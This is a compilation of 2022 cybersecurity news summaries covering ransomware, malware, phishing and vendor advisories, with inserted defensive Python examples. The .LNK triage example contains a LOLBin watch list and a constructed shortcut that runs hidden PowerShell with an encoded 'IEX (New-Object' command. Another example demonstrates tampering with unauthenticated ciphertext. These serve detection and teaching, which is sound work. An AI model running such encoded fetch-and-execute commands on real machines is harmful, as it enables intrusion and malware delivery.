    A lesser-known ransomware strain called AstraLocker has recently released its second major version, and according to threat analysts, its operators engage in rapid attacks that drop its payload directly from email attachments. This approach is quite unusual, as all the intermediate steps that typically characterize email attacks are there to help evade detection and minimize the chances of raising red flags on email security products. According to ReversingLabs, which has been following AstraLocker operations, the adversaries don’t seem to care about reconnaissance, evaluation of valuable files, and lateral network movement. Instead, they are performing "smash-n-grab" attacks that hit immediately with maximum force, aiming for a quick payout.

    Ukraine Arrests Cybercrime Gang Operating Over 400 Phishing Sites

    Ukraine’s cyberpolice force recently arrested nine members of a criminal group that operated over 400 phishing websites pretending to be legitimate EU portals offering financial assistance to Ukrainians. “The threat actors used forms on the site to steal visitors' payment card data and online banking account credentials and perform fraudulent, unauthorized transactions like moving funds to accounts under their control” (Bleeping Computer, 2022). In total, this cybercrime operation was able to steal approximately $3,360,000 from roughly 5,000 victimized citizens. While it is unclear how the victims ended up on these phishing sites, the cybercriminals could have used various means, including SEO poisoning, direct messaging, email, and scam posts on social media platforms.

    Xfiles Info-Stealing Malware Adds Support for Follina Delivery

    The XFiles info-stealer malware has added a delivery module that exploits CVE-2022-30190, aka Follina, for dropping the payload on target computers. The flaw, discovered as a zero-day at the end of May and fixed with Microsoft’s Windows update on June 14, enables the execution of PowerShell commands simply by opening a Word document.

    Deepfakes and Stolen PII Utilized to Apply for Remote Work Positions — FBI

    The FBI Internet Crime Complaint Center (IC3) warns of an increase in complaints reporting the use of deepfakes and stolen Personally Identifiable Information (PII) to apply for a variety of remote work and work-at-home positions. Deepfakes include a video, an image, or recording convincingly altered and manipulated to misrepresent someone as doing or saying something that was not actually done or said.

    Ransomware Suspected in Wiltshire Farm Foods Attack

    A leading UK producer of frozen ready meals has revealed its systems are currently down after experiencing a serious cyber-attack. Wiltshire Farm Foods said on Sunday that it is “currently experiencing severe difficulties” with its computer systems. “If you are expecting a delivery this week (w/c 27th June) or have other concerns, please contact your local depot,” it continued. Wiltshire says its systems are currently not working, and it will be unable to make deliveries for the next few days. While the company released few details about the attack, security experts on social media noted the high likelihood of a ransomware attack.

    AMD Investigates RansomHouse Hack Claims, Theft of 450GB Data

    Semiconductor giant AMD says they are investigating a cyberattack after the RansomHouse gang claimed to have stolen 450 GB of data from the company last year. RansomHouse is a data extortion group that breaches corporate networks, steals data, and then demands a ransom payment to not publicly leak the data or sell it to other threat actors. For the past week, RansomHouse has been teasing on Telegram that they would be selling the data for a well-known three-letter company that starts with the letter A.

    New ZuoRAT Malware Targets Soho Routers in North America, Europe

    Security researchers at Lumen’s Black Lotus Labs have uncovered a new remote access trojan (RAT) dubbed ZuoRAT. Since 2020, ZuoRAT has stayed under the radar, targeting remote workers via small office/home office (SOHO) routers across North America and Europe. “We identified a multistage remote access trojan (RAT) developed for SOHO devices that grants the actor the ability to pivot into the local network and gain access to additional systems on the LAN by hijacking network communications to maintain an undetected foothold.”

    Kaspersky Reveals Phishing Emails That Employees Find Most Confusing

    Phishing simulator data from Kaspersky’s Security Awareness Platform shows that workers tend to not notice pitfalls hidden in emails devoted to corporate issues and delivery problem notifications, with one in five (16% to 18%) clicking the link in the email templates imitating these phishing attacks. According to estimates, 91% of all cyberattacks begin with a phishing email, and phishing techniques are involved in 32% of all successful data breaches.

    APT Hackers Targeting Industrial Control Systems with ShadowPad Backdoor

    Entities located in Afghanistan, Malaysia, and Pakistan are in the crosshairs of an attack campaign that targets unpatched Microsoft Exchange Servers as an initial access vector to deploy the ShadowPad malware. Russian cybersecurity firm Kaspersky, which first detected the activity in mid-October 2021, attributed it to a previously unknown Chinese-speaking threat actor. Targets include organizations in the telecommunications, manufacturing, and transport sectors.

    Over 900,000 Kubernetes Instances Found Exposed Online

    Security researchers at Cyble recently uncovered over 900,000 misconfigured Kubernetes clusters that were exposed on the Internet to potentially malicious scans, some even vulnerable to data-exposing cyberattacks. For its part, Kubernetes is a highly versatile open-source container orchestration system for hosting online services and managing containerized workloads via a uniform API interface. Due to its scalability, flexibility in multi-cloud environments, portability, and cost, Kubernetes has seen a mass adoption by users in the last couple of years.

    Raccoon Stealer Is Back With a New Version to Steal Your Passwords

    The Raccoon Stealer malware is back with a second major version circulating on cybercrime forums, offering hackers elevated password-stealing functionality and upgraded operational capacity. The Raccoon Stealer operation shut down in March 2022 when its operators announced that one of the lead developers was killed during Russia’s invasion of Ukraine. The remaining team promised to return with a second version, relaunching the MaaS (malware as a service) project on upgraded infrastructure and with more capabilities.

    2022 CWE Top 25 Most Dangerous Software Weaknesses

    The Homeland Security Systems Engineering and Development Institute, sponsored by CISA and operated by MITRE, has released the 2022 Common Weakness Enumeration (CWE) Top 25 Most Dangerous Software Weaknesses list. The list uses data from the National Vulnerability Database to compile the most frequent and critical errors that can lead to serious vulnerabilities in software. An attacker can often exploit these vulnerabilities to take control of an affected system, obtain sensitive information, or cause a denial-of-service condition. This year’s list also incorporates updated weakness data for recent Common Vulnerabilities and Exposure records in the dataset that are part of CISA’s Known Exploited Vulnerabilities Catalog.

    New Vulnerability Database Catalogs Cloud Security Issues

    A new community-based database launched this week seeks to begin addressing that issue by providing a central repository of information on known cloud service-provider security issues and the steps organizations can take to mitigate them. The database — cloudvulndb.org — is the brainchild of security researchers at Wiz, who for some time have been advocating the need for a public catalog of known security flaws on platforms and services run by the likes of AWS, Microsoft, and Google. The database currently lists some 70 cloud security issues and vulnerabilities that security researcher Scott Piper had previously compiled in a document on GitHub titled "Cloud Service Provider security mistakes." Going forward, anyone is free to suggest new issues to add to the website or to suggest new fixes to existing issues. The goal is to list issues that a cloud service provider might have already addressed.

    Android Malware ‘Revive’ Impersonates BBVA Bank’s 2FA App

    A new Android banking malware named Revive has been discovered that impersonates an MFA application required to log into BBVA bank accounts in Spain. The new banking trojan follows a more focused approach, targeting the BBVA bank instead of attempting to compromise customers of multiple financial institutions. Revive appears to still be in the early phases of development, but includes some sophisticated functions, like its ability to intercept multi-factor authentication (MFA) codes and one-time passwords.

    Fake Copyright Infringement Emails Install LockBit Ransomware

    The emails, which were discovered by researchers at AhnLab in Korea, did not identify which files were inappropriately utilized in the body of the message; rather, they instructed the receiver to download and open the attached file in order to see the infringing material. Similar to traditional phishing campaigns, the attachment is a password-protected ZIP file that contains a compressed file. The compressed file contains an executable that seems to be a PDF document but is really an NSIS installer for the LockBit 2.0 ransomware. The recipients of these emails are warned about a copyright violation, allegedly having used media files without the creator’s license. These emails demand that the recipient remove the infringing content from their websites, or they will face legal action.

    Cyberattack Halted the Production at the Iranian state-owned Khuzestan Steel Company

    Iran is the leading producer of steel in the Middle East and among the top 10 in the world, according to the World Steel Association. Its iron ore mines provide raw materials for domestic production and are exported to dozens of countries, including Italy, China and the United Arab Emirates. With that said, “One of Iran’s major steel companies said on Monday it was forced to halt production after being hit by a cyberattack, apparently marking one of the biggest such assaults on the country’s strategic industrial sector in recent memory.” The state-owned Khuzestan Steel Company said experts had determined the plant had to stop work until further notice “due to technical problems” following “cyberattacks.” The company’s website was down on Monday.

    Cyberattack Against Ukrainian Telecommunications Operators Using DarkCrystal RAT Malware

    The Governmental Computer Emergency Response Team of Ukraine (CERT-UA) is warning of a new malware distribution campaign targeting Ukrainian telecommunication operators with DarkCrystal RAT. DarkCrystal is a remote access trojan that first came into the spotlight in 2018. Written in the .NET programming language, DarkCrystal can be used by threat actors to perform surveillance, reconnaissance, remote code execution, and DDoS attacks.

    LockBit 3.0 Introduces the First Ransomware Bug Bounty Program

    Over the weekend, the LockBit ransomware group released a revamped ransomware-as-a-service (RaaS) operation called LockBit 3.0 after beta testing for the past two months, with the new version already used in attacks. While it is unclear what technical changes were made to LockBit’s encryptor, its ransom notes are no longer named 'Restore-My-Files.txt' and instead have moved to the naming format, [id].README.txt.

    Clever Phishing Method Bypasses MFA Using Microsoft WebView2 Apps

    “A clever, new phishing technique uses Microsoft Edge WebView2 applications to steal victims’ authentication cookies, allowing threat actors to bypass multi-factor authentication when logging into stolen accounts” (Bleeping Computer, 2022). Data breaches and phishing campaigns have led to a large number of exposed login credentials. The increased adoption of multi-factor authentication (MFA) has made it difficult for cybercriminals to take advantage of these stolen and leaked credentials. As a result, they continue to look for ways to bypass MFA.

    Malicious Windows ‘LNK’ Attacks Made Easy With New Quantum Builder

    Researchers at Cyble recently came across a new tool called Quantum that cybercriminals can use to build malicious .LNK files. LNKs are Windows shortcut files; a malicious one does not carry code of its own but points at a legitimate binary already on the system, a so-called living-off-the-land binary (LOLBin) such as PowerShell or MSHTA (which runs Microsoft HTML Application, or HTA, files), and passes it attacker-controlled arguments. Because of this, LNKs are used extensively for malware distribution, especially in phishing campaigns; notable malware families currently using them include Emotet, Bumblebee, Qbot, and IcedID.
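    The abuse described above lives in two fields of the shortcut, the target path and the command-line arguments, so triage comes down to reading those. The following parser is an added example, not code from Cyble's report or from the Quantum builder: it walks the header and StringData sections of the [MS-SHLLINK] format, extracts the target and arguments, and flags shortcuts whose target is a LOLBin. The LOLBin watch list and the sample shortcuts produced by build_lnk() are constructed for this demonstration.

```python
"""Minimal parser for Windows Shell Link (.LNK) files (added example, see lead-in)."""
import struct

# LinkFlags bits ([MS-SHLLINK] 2.1.1) that decide which optional sections follow the header.
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
SHOW_COMMAND_OFFSET = 0x3C                                      # ShowCommand field inside the header
SW_SHOWMINNOACTIVE = 7                                          # launches the target minimised

# Assumed watch list of binaries commonly abused by malicious shortcuts (not from the article).
LOLBINS = {
    "powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "rundll32.exe",
    "regsvr32.exe", "wscript.exe", "cscript.exe", "certutil.exe", "bitsadmin.exe",
}

# StringData entries appear in this order, each only if its flag bit is set.
STRING_FIELDS = (
    (HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"), (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"), (HAS_ICON_LOCATION, "icon_location"),
)


def _read_string(data, offset, unicode):
    """StringData entry: 2-byte character count followed by the characters (no terminator)."""
    (count,) = struct.unpack_from("<H", data, offset)
    offset += 2
    if unicode:
        return data[offset:offset + 2 * count].decode("utf-16-le"), offset + 2 * count
    return data[offset:offset + count].decode("latin-1"), offset + count


def parse_lnk(data):
    """Return the header flags, ShowCommand and every StringData field present."""
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != HEADER_SIZE or clsid != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    (show_command,) = struct.unpack_from("<I", data, SHOW_COMMAND_OFFSET)
    offset = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:           # skip the IDList: 2-byte size, then the items
        (idlist_size,) = struct.unpack_from("<H", data, offset)
        offset += 2 + idlist_size
    if flags & HAS_LINK_INFO:                     # skip LinkInfo: its size field counts itself
        (link_info_size,) = struct.unpack_from("<I", data, offset)
        offset += link_info_size
    result = {"flags": flags, "show_command": show_command}
    unicode = bool(flags & IS_UNICODE)
    for bit, key in STRING_FIELDS:
        if flags & bit:
            result[key], offset = _read_string(data, offset, unicode)
    return result


def analyze_lnk(data):
    """Triage one shortcut: which binary it launches, with what, and whether that looks like LOLBin abuse."""
    info = parse_lnk(data)
    target = info.get("relative_path", "").replace("/", "\\").rsplit("\\", 1)[-1].lower()
    args = info.get("arguments", "")
    return {
        "target": target,
        "arguments": args,
        "lolbin": target in LOLBINS,
        "hidden_window": info["show_command"] == SW_SHOWMINNOACTIVE,
        "encoded_command": "-enc" in args.lower(),   # PowerShell -EncodedCommand and its short forms
    }


def build_lnk(relative_path, arguments, show_command=1):
    """Constructed sample: a minimal Unicode LNK carrying only a relative path and arguments."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    # HeaderSize, CLSID, LinkFlags, FileAttributes, 3 timestamps, FileSize, IconIndex,
    # ShowCommand, HotKey, Reserved1, Reserved2, Reserved3 (76 bytes in total).
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LNK_CLSID, flags,
                         0, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)

    def string_data(text):
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    return header + string_data(relative_path) + string_data(arguments)


if __name__ == "__main__":
    sample = build_lnk(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                       "-w hidden -nop -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
                       show_command=SW_SHOWMINNOACTIVE)
    print(analyze_lnk(sample))
```

    Real shortcuts built by tools like Quantum usually also carry an IDList and LinkInfo block, which the parser skips by size; the fields that matter for detection are the ones it returns. A hidden window plus an encoded PowerShell command is the combination worth alerting on.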

    Conti Ransomware Finally Shuts Down Data Leak, Negotiation Sites

    The Conti ransomware operation has finally shut down its last public-facing infrastructure, consisting of two Tor servers used to leak data and negotiate with victims, closing the final chapter of the notorious cybercrime brand. According to threat intel analyst Ido Cohen, Conti’s servers were shut down on Wednesday and BleepingComputer has confirmed they are still offline as of today. The news comes after BleepingComputer reported in May that Conti had started to shut down their operations, telling members that the brand was no more and that its internal infrastructure had been decommissioned, including communication and storage servers.

    Spyware Vendor Works with ISPs to Infect iOS and Android Users

    Google's Threat Analysis Group (TAG) revealed today that RCS Labs, an Italian spyware vendor, has received help from some Internet service providers (ISPs) to infect Android and iOS users in Italy and Kazakhstan with commercial surveillance tools. Google tracks more than 30 spyware vendors. RCS Labs’ spyware uses drive-by downloads (T1608.004) to infect victims. Targets are generally prompted to install malicious apps (T1204.002) that mimic legitimate mobile carrier apps (T1036): the victim appears to lose internet connectivity and is then told to install the malicious app to get back online with their ISP.

    Hackers Exploit Mitel VoIP Zero-Day Bug to Deploy Ransomware

    A suspected ransomware intrusion against an unnamed target leveraged a Mitel VoIP appliance as an entry point to achieve remote code execution and gain initial access to the environment. The findings come from cybersecurity firm CrowdStrike, which traced the source of the attack to a Linux-based Mitel VoIP device sitting on the network perimeter, while also identifying a previously unknown exploit as well as a couple of anti-forensic measures adopted by the actor on the device to erase traces of their actions.

    Chinese Hackers Target Script Kiddies With Info-Stealer Trojan

    Cybersecurity researchers have discovered a new campaign attributed to the Chinese "Tropic Trooper" hacking group, which employs a novel loader called Nimbda and a new variant of the Yahoyah trojan. The trojan is bundled in a greyware tool named 'SMS Bomber,' which is used for denial-of-service (DoS) attacks against phones, flooding them with messages. Tools like this are commonly used by "beginner" threat actors who want to launch such attacks. According to a report by Check Point, the threat actors also demonstrate in-depth cryptographic knowledge, extending the AES specification in a custom implementation.

    Conti Ransomware Hacking Spree Breaches Over 40 Orgs in a Month

    Today, cybersecurity firm Group-IB published a report detailing what researchers refer to as one of the “shortest yet most successful” campaigns conducted by the Conti ransomware group. Codenamed ARMattack, the campaign occurred last year, between November 17 and December 20, 2021. Within a span of one month, Conti affiliates were able to compromise more than 40 organizations in various sectors across the world.

    Windows 10 and Windows 11 Downloads Blocked in Russia

    People in Russia can no longer download Windows 10 and Windows 11 ISOs and installation tools from Microsoft, and the company has given no reason for the block. Russia's TASS news agency first reported the problem over the weekend, and the news quickly spread on Twitter. Using a VPN server located in Russia, BleepingComputer confirmed that attempts to download the Windows 10 Update Assistant, the Windows 10 Media Creation Tool, and the Windows 11 Installation Assistant return a message stating, "404 - File or Directory not found."

    Critical PHP Flaw exposes QNAP NAS devices to RCE attacks

    QNAP warned customers today that some of its Network Attached Storage (NAS) devices running non-default configurations are vulnerable to attacks exploiting a three-year-old critical PHP vulnerability that allows remote code execution. "A vulnerability has been reported to affect PHP versions 7.1.x below 7.1.33, 7.2.x below 7.2.24, and 7.3.x below 7.3.11. If exploited, the vulnerability allows attackers to gain remote code execution," QNAP explained in a security advisory released today.

    Russian Govt Hackers Hit Ukraine With Cobalt Strike, CredoMap Malware

    The Ukrainian Computer Emergency Response Team (CERT) is warning that Russian hacking groups are exploiting the Follina code execution vulnerability in new phishing campaigns to install the CredoMap malware and Cobalt Strike beacons. According to an advisory published by Microsoft, Follina is a “remote code execution vulnerability [that] exists when MSDT is called using the URL protocol from a calling application such as Word. An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user’s rights.”

    Researchers Uncover Ways to Break the Encryption of 'MEGA' Cloud Storage Service

    A new piece of research from academics at ETH Zurich has identified a number of critical security issues in the MEGA cloud storage service that could be leveraged to break the confidentiality and integrity of user data. With more than 10 million daily active users and over 122 billion files uploaded to the platform to date, MEGA promises user-controlled end-to-end encryption (UCE). However, the researchers point out in their paper, titled “MEGA: Malleable Encryption Goes Awry”, that MEGA’s system does not protect its users against a malicious server, so a rogue operator (or anyone who compromises the server) can fully compromise the privacy of the uploaded files. The practical lesson is that "end-to-end" only holds if the server cannot tamper with ciphertext undetected: confidentiality without integrity protection is not enough.
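    The word "malleable" in the paper's title is the crux, so here is a generic illustration of what it means; this is an added example and is not MEGA's key hierarchy or any of the attacks the paper describes. The toy stream cipher (HMAC-SHA256 in counter mode), the key-derivation step and the keys are constructed for the demonstration. The point it shows: with XOR-based encryption and no integrity tag, a server that never learns the key can still rewrite any plaintext it can guess at a known offset, and an encrypt-then-MAC layer is what turns that into a detected failure.

```python
"""Ciphertext malleability versus encrypt-then-MAC (added example, see lead-in)."""
import hashlib
import hmac

TAG_LEN = 32


def _subkey(key, purpose):
    """Derive independent encryption and MAC keys from one master key (assumed KDF, not MEGA's)."""
    return hashlib.sha256(purpose + key).digest()


def keystream(key, nonce, length):
    """HMAC-SHA256 counter-mode keystream: block i = HMAC(key, nonce || i)."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return bytes(out[:length])


def encrypt(key, nonce, plaintext):
    """Stream encryption is XOR with the keystream, so decryption is the same operation."""
    ks = keystream(_subkey(key, b"enc"), nonce, len(plaintext))
    return bytes(p ^ k for p, k in zip(plaintext, ks))


decrypt = encrypt


def tamper(ciphertext, offset, known, wanted):
    """Server-side edit with no key: XOR in (known ^ wanted) where the plaintext is predictable."""
    if len(known) != len(wanted):
        raise ValueError("replacement must keep the same length")
    edited = bytearray(ciphertext)
    for i, (a, b) in enumerate(zip(known, wanted)):
        edited[offset + i] ^= a ^ b
    return bytes(edited)


def seal(key, nonce, plaintext):
    """Encrypt-then-MAC: the tag covers nonce and ciphertext, so any bit flip is detected."""
    ct = encrypt(key, nonce, plaintext)
    tag = hmac.new(_subkey(key, b"mac"), nonce + ct, hashlib.sha256).digest()
    return ct + tag


def open_sealed(key, nonce, blob):
    """Return the plaintext, or None if the tag does not verify (verify before decrypting)."""
    ct, tag = blob[:-TAG_LEN], blob[-TAG_LEN:]
    expected = hmac.new(_subkey(key, b"mac"), nonce + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return None
    return decrypt(key, nonce, ct)


if __name__ == "__main__":
    key, nonce = b"\x01" * 32, b"\x02" * 12       # constructed values, never reuse a nonce in practice
    record = b"share=read-only;owner=alice"
    ct = encrypt(key, nonce, record)
    # The storage provider upgrades the permission without knowing the key.
    forged = tamper(ct, record.index(b"read-only"), b"read-only", b"readwrite")
    print(decrypt(key, nonce, forged))
    # With a MAC, the same edit is rejected instead of silently accepted.
    print(open_sealed(key, nonce, tamper(seal(key, nonce, record), 6, b"read-only", b"readwrite")))
```

    The same principle applies to block ciphers in CBC or ECB mode, where the edits are coarser but still possible; only an authenticated construction (AEAD, or encrypt-then-MAC as above) removes the attack rather than just making it fiddlier.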

    Europol Busts Phishing Gang Responsible for Millions in Losses

    Europol on Tuesday announced the dismantling of an organized crime group that dabbled in phishing, fraud, scams, and money laundering activities. The cross-border operation was carried out with the help of law enforcement authorities from Belgium and the Netherlands. In total, nine individuals were arrested. The suspects are men between the ages of 25 and 36 from Amsterdam, Almere, Rotterdam, and Spijkenisse and a 25-year-old woman from Deventer, according to a statement from the National Police Force.

    Crooks are Using RIG Exploit Kit to Push Dridex Instead of Raccoon Stealer

    The Bitdefender Cyber Threat Intelligence Lab, which has been tracking the RIG Exploit Kit since January 2022, observed its operators switch to pushing the Dridex banking trojan instead of the Raccoon Stealer. The switch occurred in February, when Raccoon Stealer temporarily halted its activity after one of its developers was killed in the Russian invasion of Ukraine. First seen in 2019, Raccoon Stealer was offered for sale on the dark web as malware-as-a-service. It is designed to steal victims’ credit card data, email credentials, and cryptocurrency wallets.

    Researchers Disclose 56 Vulnerabilities Impacting OT Devices from 10 Vendors

    Nearly five dozen security vulnerabilities have been disclosed in devices from 10 operational technology (OT) vendors, stemming from what researchers describe as "insecure-by-design practices." Collectively dubbed OT:ICEFALL by Forescout, the 56 issues span as many as 26 device models from vendors including Bently Nevada, Emerson, Honeywell, JTEKT, Motorola, Omron, Phoenix Contact, Siemens, and Yokogawa. "Exploiting these vulnerabilities, attackers with network access to a target device could remotely execute code, change the logic, files or firmware of OT devices, bypass authentication, compromise credentials, cause denials of service or have a variety of operational impacts," the company said in a technical report.

    New ToddyCat APT group targets Exchange servers in Asia, Europe

    Security researchers with Kaspersky’s Global Research & Analysis Team (GReAT) recently unveiled a previously unknown APT group, dubbed ToddyCat, that has been targeting Microsoft Exchange servers throughout Asia and Europe for more than a year. While tracking the group’s activity, researchers found a previously unknown passive backdoor they named Samurai and a new trojan dubbed Ninja. Both malware strains allow the attackers to take control of infected systems and move laterally within the victims' networks.

    New NTLM Relay Attack Lets Attackers Take Control Over Windows Domain

    A new kind of Windows NTLM relay attack dubbed DFSCoerce has been uncovered that leverages the Distributed File System (DFS): Namespace Management Protocol (MS-DFSNM) to seize control of a domain. The NTLM (NT LAN Manager) relay attack is a well-known method that exploits the challenge-response mechanism. It allows malicious parties to sit between clients and servers and intercept and relay validated authentication requests in order to gain unauthorized access to network resources, effectively gaining an initial foothold in Active Directory environments. As with other authentication-coercion techniques, the relayed credential is only useful against a service that accepts NTLM without signing or channel binding, so enforcing SMB and LDAP signing and Extended Protection for Authentication on relay targets blunts the attack even where the coercion itself cannot be prevented.

    Cisco Says It Won’t Fix Zero-Day RCE in End-Of-Life VPN Routers

    Cisco is advising owners of end-of-life Small Business RV routers to upgrade to newer models after disclosing a remote code execution vulnerability that will not be patched. The vulnerability is tracked as CVE-2022-20825 and has a CVSS severity rating of 9.8 out of 10.0. According to the Cisco security advisory (https://tools.cisco.com/security/ce...rityAdvisory/cisco-sa-sb-rv-overflow-s2r82P9v), the flaw exists due to insufficient validation of user input in incoming HTTP packets on the impacted devices. An attacker could exploit it by sending a specially crafted request to the web-based management interface, resulting in command execution with root-level privileges. The vulnerability impacts four Small Business RV Series models:

    • RV110W Wireless-N VPN Firewall
    • RV130 VPN Router
    • RV130W Wireless-N Multifunction VPN Router
    • RV215W Wireless-N VPN Router

    Cisco states that it will not release a security update for CVE-2022-20825 because the devices are no longer supported. There are no mitigations other than disabling remote management on the WAN interface, which should be done regardless for better overall security; note that this only removes the internet-facing exposure, since the vulnerable management interface remains reachable from the LAN until the device is replaced.

    New Phishing Attack Infects Devices with Cobalt Strike

    Security researchers have noticed a new malicious spam campaign that delivers the 'Matanbuchus' malware to drop Cobalt Strike beacons on compromised machines (T1105 - Ingress Tool Transfer). Cobalt Strike is a penetration testing suite that is frequently used by threat actors for lateral movement and to drop additional payloads.

    Websites Hosting Fake Cracks Spread Updated CopperStealer Malware

    Researchers from Trend Micro noticed a new version of CopperStealer and, on analysis, linked the samples to a campaign they had previously documented. Comparing the new version with earlier ones, they found it reuses parts of the old code and observed the following similarities:

    • The same cryptor
    • Use of Data Encryption Standard (DES) with the same key
    • The same name of the DLL export function (for later versions of CopperStealer)
    • Data exfiltration to a Telegram channel (for later versions of CopperStealer)
    • Use of the executable utility MiniThunderPlatform

    The newly updated malware has several capabilities and attack stages, with the initial infection vector consisting of a website offering fake cracks. These websites usually display two buttons, one offering to download and the other to set up the desired cracks. Selecting either button begins the redirection chain, requiring the user to select another “Download” button. Afterward, a download prompt appears and the user is prompted to save the file to the computer.

    Russian RSocks Botnet Disrupted After Hacking Millions of Devices

    The U.S. Department of Justice has announced the disruption of the Russian RSocks malware botnet used to hijack millions of computers, Android smartphones, and IoT (Internet of Things) devices worldwide for use as proxy servers. The law enforcement operation involved the FBI and police forces in Germany, the Netherlands, and the United Kingdom, where the botnet maintained parts of its infrastructure.

    Over a Million WordPress Sites Forcibly Updated to Patch a Critical Plugin Vulnerability

    WordPress websites using the widely deployed Ninja Forms plugin have been updated automatically to remediate a critical security vulnerability that is suspected of having been actively exploited in the wild. The issue, a code injection flaw, is rated 9.8 out of 10 for severity and affects multiple versions starting from 3.0. It has been fixed in 3.0.34.2, 3.1.10, 3.2.28, 3.3.21.4, 3.4.34.2, 3.5.8.4, and 3.6.11. Forced updates do not reach every site (sites with automatic updates disabled, or hosted where the update service is blocked, stay behind), so the installed version should still be checked against the fixed release of its own minor branch.
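    Because the fix list above has one patched release per minor branch, a check that compares the installed version against the highest number (3.6.11) alone gets it wrong: 3.5.8.3 sorts below 3.6.11 yet is vulnerable, and 3.0.34.2 sorts below it yet is patched. The following is an added example, not code from WordPress or the plugin's maintainers; it reads the version from the plugin's PHP header (the header text is a constructed sample) and compares it branch by branch.

```python
"""Branch-aware vulnerability check against a per-branch fix list (added example, see lead-in)."""
import re

# Fixed releases from the advisory, one per affected minor branch (3.0 through 3.6).
FIXED_RELEASES = ["3.0.34.2", "3.1.10", "3.2.28", "3.3.21.4", "3.4.34.2", "3.5.8.4", "3.6.11"]
FIRST_AFFECTED = "3.0"


def parse_version(text):
    """Turn '3.5.8.3' into (3, 5, 8, 3) so that tuple comparison orders releases correctly."""
    return tuple(int(part) for part in text.strip().split("."))


def fixed_release_for(installed):
    """Return the patched release of the installed version's minor branch, or None if there is none."""
    branch = parse_version(installed)[:2]
    for release in FIXED_RELEASES:
        if parse_version(release)[:2] == branch:
            return release
    return None


def is_vulnerable(installed):
    """True if the installed version is inside the affected range and below its branch's fix."""
    version = parse_version(installed)
    if version < parse_version(FIRST_AFFECTED):
        return False                        # pre-3.0 releases are outside the affected range
    fix = fixed_release_for(installed)
    if fix is None:
        # Assumption: a branch newer than every listed fix (a future 3.7.x, say) post-dates the patch.
        return version < parse_version(FIXED_RELEASES[-1])
    return version < parse_version(fix)


def version_from_plugin_header(php_source):
    """Read the 'Version:' line of a WordPress plugin's main PHP file header."""
    match = re.search(r"^\s*\*?\s*Version:\s*(\S+)", php_source, re.MULTILINE)
    return match.group(1) if match else None


# Constructed sample of the header block found at the top of a plugin's main PHP file.
SAMPLE_PLUGIN_HEADER = """<?php
/*
Plugin Name: Ninja Forms
Plugin URI: https://ninjaforms.com/
Description: Drag and drop fields to build forms.
Version: 3.6.10
*/
"""


def audit(php_source):
    """Combine both steps: find the installed version and say whether, and to what, it must be updated."""
    installed = version_from_plugin_header(php_source)
    if installed is None:
        return {"installed": None, "vulnerable": None, "update_to": None}
    return {
        "installed": installed,
        "vulnerable": is_vulnerable(installed),
        "update_to": fixed_release_for(installed),
    }


if __name__ == "__main__":
    print(audit(SAMPLE_PLUGIN_HEADER))
```

    The same shape of check applies to any advisory that back-ports a fix to several maintained branches: key the comparison on the branch first, then on the version within it.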

    Researchers Uncover 'Hermit' Android Spyware Used in Kazakhstan, Syria, and Italy

    An enterprise-grade surveillanceware dubbed Hermit has been put to use by entities operating from within Kazakhstan, Syria, and Italy over the years since 2019, new research has revealed. Lookout Threat Lab attributed the spy software, which is equipped to target both Android and iOS, to an Italian company named RCS Lab S.p.A and Tykelab Srl, a telecom services provider which it suspects to be a front company. The San Francisco-based cybersecurity firm said it detected the campaign aimed at Kazakhstan in April 2022.

    Cisco Secure Email Bug Can Let Attackers Bypass Authentication

    Yesterday, Cisco released a security advisory to address a critical vulnerability that could allow attackers to bypass authentication and log in to the web management interface of Cisco email gateway appliances with non-default configurations. Tracked as CVE-2022-20798, the flaw resides in the external authentication functionality of virtual and hardware Cisco Email Security Appliance (ESA) and Cisco Secure Email and Web Manager appliances. “This vulnerability is due to improper authentication checks when an affected device uses Lightweight Directory Access Protocol (LDAP) for external authentication. An attacker could exploit this vulnerability by entering a specific input on the login page of the affected device. A successful exploit could allow the attacker to gain unauthorized access to the web-based management interface of the affected device.”

    Microsoft Office 365 Feature Can Help Cloud Ransomware Attacks

    Security researchers are warning that threat actors could hijack Office 365 accounts to encrypt for a ransom the files stored in SharePoint and OneDrive services that companies use for cloud-based collaboration, document management and storage. A ransomware attack targeting files on these services could have severe consequences if backups aren’t available, rendering important data inaccessible to owners and working groups.

    Extortion Gang Ransoms Shoprite, Largest Supermarket Chain in Africa

    Shoprite Holdings, Africa's largest supermarket chain, has been hit by a ransomware attack. The retailer has a revenue of $5.8 billion and 149,000 employees, and operates 2,943 stores across twelve countries on the continent, serving millions of customers in South Africa, Nigeria, Ghana, Madagascar, Mozambique, Namibia, DRC, Angola, and elsewhere.

    Internet Explorer (Almost) Breathes Its Final Byte on Wednesday

    Microsoft will finally end support for Internet Explorer on multiple Windows versions on Wednesday, June 15, almost 27 years after its launch on August 24, 1995. After finally reaching its end of life, the Internet Explorer desktop application will be disabled. It will be replaced with the new Chromium-based Microsoft Edge, with users automatically redirected to Edge when launching IE11.

    Panchan: A New Golang-based Peer-To-Peer Botnet Targeting Linux Servers

